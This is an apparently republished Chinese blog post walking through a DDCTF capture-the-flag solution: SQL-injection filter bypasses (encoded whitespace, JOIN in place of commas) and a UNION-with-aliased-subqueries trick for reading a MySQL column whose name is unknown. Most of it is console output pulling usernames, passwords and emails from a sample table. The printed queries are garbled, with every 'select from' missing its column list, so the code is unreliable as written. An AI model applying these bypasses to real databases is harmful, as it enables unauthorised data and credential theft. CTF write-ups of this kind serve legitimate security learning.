Mysql如何巧妙的绕过未知字段名详解
网络编程 2021-07-05 14:36www.168986.cn编程入门
这篇文章主要给大家介绍了Mysql如何巧妙的绕过未知字段名的相关资料,文中给出了详细的示例代码供大家参考学习,对学习mysql具有一定的参考学习价值,需要的朋友们狼蚁网站SEO优化来一起看看吧。
前言
本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,狼蚁网站SEO优化来看看详细的介绍
实现思路
题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;
存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下
思想就是获取flag,让其在已知字段名下出现;
示例代码
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | a | b | c | d | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec) mysql> select from (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec) mysql> select from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select from user; +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | | 1 | admin | admin888 | 110@110. | | 2 | test | test123 | 119@119. | | 3 | cs | cs123 | 120@120. | +---+-------+----------+-------------+ 4 rows in set (0.01 sec) mysql> select e.4 from (select from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select from user)e; +-------------+ | 4 | +-------------+ | 4 | | 110@110. | | 119@119. | | 120@120. | +-------------+ 4 rows in set (0.03 sec) mysql> select e.4 from (select from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select from user)e limit 1 offset 3; +-------------+ | 4 | +-------------+ | 120@120. | +-------------+ 1 row in set (0.01 sec) mysql> select from user where id=1 union select (select e.4 from (select from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i; +-------------+----------+----------+-------------+ | id | username | password | email | +-------------+----------+----------+-------------+ | 1 | admin | admin888 | 110@110. | | 120@120. | 1 | 1 | 1 | +-------------+----------+----------+-------------+ 2 rows in set (0.04 sec)
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对狼蚁SEO的支持。
上一篇:mysql 触发器用法实例详解
下一篇:SQL计算timestamp的差值的方法
编程语言
- 如何快速学会编程 如何快速学会ug编程
- 免费学编程的app 推荐12个免费学编程的好网站
- 电脑怎么编程:电脑怎么编程网咯游戏菜单图标
- 如何写代码新手教学 如何写代码新手教学手机
- 基础编程入门教程视频 基础编程入门教程视频华
- 编程演示:编程演示浦丰投针过程
- 乐高编程加盟 乐高积木编程加盟
- 跟我学plc编程 plc编程自学入门视频教程
- ug编程成航林总 ug编程实战视频
- 孩子学编程的好处和坏处
- 初学者学编程该从哪里开始 新手学编程从哪里入
- 慢走丝编程 慢走丝编程难学吗
- 国内十强少儿编程机构 中国少儿编程机构十强有
- 成人计算机速成培训班 成人计算机速成培训班办
- 孩子学编程网上课程哪家好 儿童学编程比较好的
- 代码编程教学入门软件 代码编程教程